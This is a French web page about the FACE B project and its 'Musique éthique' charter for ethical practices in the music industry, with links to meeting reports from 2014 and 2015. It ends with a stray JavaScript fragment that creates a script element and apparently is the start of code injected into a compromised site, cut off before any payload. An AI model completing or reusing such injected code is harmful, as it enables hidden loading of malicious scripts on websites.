L’objectif général du projet FACE B est de fédérer, d’informer, et d’accompagner les acteurs de la filière musicale vers des pratiques professionnelles éthiques et solidaires. Chaque acteur de la filière qui souhaite s’engager à améliorer ses pratiques, de l’artiste au spectateur, en passant par le producteur ou la salle de concert, est amené à rejoindre la fédération en signant la Charte « Musique éthique ».

Capture d’écran 2015-04-20 à 08.48.21Ce réseau encourage l’échange de connaissances et de compétences ; on peut y partager des informations à caractère réglementaire, technique ou artistique, et y relayer des informations musicales – sorties d’albums, tenue de concerts, événements, etc. Il permet également de participer aux différents débats sur la musique éthique et solidaire, ainsi que de mettre à l’épreuve ses pratiques dites « responsables » lors de productions en commun.

Plusieurs rencontres professionnelles « Musique éthique » ont déjà été organisées, et de nombreux professionnels, techniciens, chargés de projets, ainsi que de nombreux artistes, ont pu échanger sur leurs pratiques concernant la production, l’édition, l’organisation d’événements, ou encore l’accompagnement à la création d’activité dans le milieu culturel et plus particulièrement musical.

Le nombre des acteurs qui rejoignent ce réseau est en constante progression. Ensemble, ils tentent de sensibiliser un cercle toujours plus large au contenu de la Charte « Musique éthique », et ils portent le développement d’un Système de Garantie Participatif (SGP) en cours d’expérimentation.

Téléchargez la Charte « Musique éthique » CHARTE FACE B

Pour plus d’information, téléchargez les comptes-rendus des rencontres « Musique éthique » :

27 novembre 2014 : Les outils de l’ESS au service de la filière musicale 31 mars 2015 : La Charte « Musique éthique » et les pratiques responsables en musique CR Rencontre ME – 31 mars 2015    

var d=document;var s=d.createElement(‘script’);